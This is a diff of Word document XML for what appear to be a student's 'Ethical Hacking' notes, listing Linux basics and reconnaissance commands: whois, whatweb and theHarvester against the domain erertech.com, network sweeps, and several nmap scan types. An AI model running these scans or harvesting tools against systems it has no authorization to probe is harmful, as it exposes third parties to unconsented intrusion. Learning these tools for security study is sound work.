+        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48EF3815"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6668300A"/>
@@ -9073,7 +8379,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="527E7511"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3D007ACE"/>
@@ -9162,7 +8468,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66D8281C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="162256E8"/>
@@ -9251,7 +8557,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79E35021"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3DA6568C"/>
@@ -9341,31 +8647,40 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1830051639">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1548644043">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="92751156">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="390814802">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="92751156">
+  <w:num w:numId="5" w16cid:durableId="1514765802">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="390814802">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="1514765802">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
   <w:num w:numId="6" w16cid:durableId="2140680956">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1634290607">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1474054670">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="2020355101">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="799345839">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="472672449">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="9" w16cid:durableId="2020355101">
-    <w:abstractNumId w:val="8"/>
+  <w:num w:numId="12" w16cid:durableId="2116365198">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -90,6 +90,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -100,7 +101,14 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">(open port 80, </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">open port 80, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -228,9 +236,19 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo ifconfig</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ifconfig</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -264,8 +282,13 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>pwd – current directory</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – current directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -300,12 +323,14 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>M</w:t>
             </w:r>
             <w:r>
               <w:t>kdir</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – add folder</w:t>
             </w:r>
@@ -403,8 +428,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Virtual Machine msfadmin</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Virtual Machine </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -496,7 +526,15 @@
               <w:t xml:space="preserve">mv </w:t>
             </w:r>
             <w:r>
-              <w:t>– to move file{mv file3.py FOLDERNAME}</w:t>
+              <w:t xml:space="preserve">– to move </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>file{</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>mv file3.py FOLDERNAME}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -513,8 +551,21 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>sudo su – ROOT USER</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -687,11 +738,19 @@
                 <w:highlight w:val="green"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Ping()</w:t>
+              <w:t>Ping(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -708,11 +767,19 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup erertech.com</w:t>
+              <w:t>Nglookup</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -723,6 +790,7 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -735,6 +803,7 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -765,8 +834,13 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Whatweb erertech.com -v</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -801,6 +875,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -813,6 +888,7 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -832,6 +908,7 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -842,12 +919,19 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">hatweb </w:t>
-            </w:r>
+              <w:t>hatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>erertech.com</w:t>
             </w:r>
             <w:r>
@@ -863,16 +947,24 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>whatweb 192</w:t>
-            </w:r>
+              <w:t>whatweb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve"> 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>.168.1.4-192.168.1.255</w:t>
             </w:r>
             <w:r>
@@ -975,12 +1067,14 @@
               </w:rPr>
               <w:t>-</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>theHarvester</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1010,12 +1104,26 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
-            </w:r>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t>theHarvester</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t>-b all</w:t>
             </w:r>
           </w:p>
@@ -1086,9 +1194,11 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:t>Redhawk(</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:t>software tools</w:t>
             </w:r>
@@ -1108,13 +1218,23 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo apt install python-pip</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1373,13 +1493,31 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo netdiscover</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>netdiscover</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1447,9 +1585,117 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:w="9576" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sC</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>oN</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>folderName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>} {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>TargetIPAddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -1457,7 +1703,11 @@
               <w:t>Nmap</w:t>
             </w:r>
             <w:r>
-              <w:t>(Checking PORTS)</w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>Checking PORTS)</w:t>
             </w:r>
             <w:r>
               <w:t>- Sometimes it takes hours to scan.</w:t>
@@ -1474,7 +1724,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">You have to put </w:t>
+              <w:t xml:space="preserve">You </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>have to</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> put </w:t>
             </w:r>
             <w:r>
               <w:t>this</w:t>
@@ -1601,7 +1859,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -sS {IPADDRESS}</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1632,8 +1906,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sU</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1649,7 +1944,15 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -s</w:t>
+              <w:t>Nmap -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>s</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1658,6 +1961,7 @@
               </w:rPr>
               <w:t>T</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1698,8 +2002,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>man nmap</w:t>
-            </w:r>
+              <w:t xml:space="preserve">man </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – manual, really helps!</w:t>
             </w:r>
@@ -1750,14 +2062,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
             </w:r>
             <w:r>
               <w:t>O</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1784,8 +2117,37 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1796,24 +2158,115 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo nmap -A {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>nmap -sn {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -A {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
             <w:r>
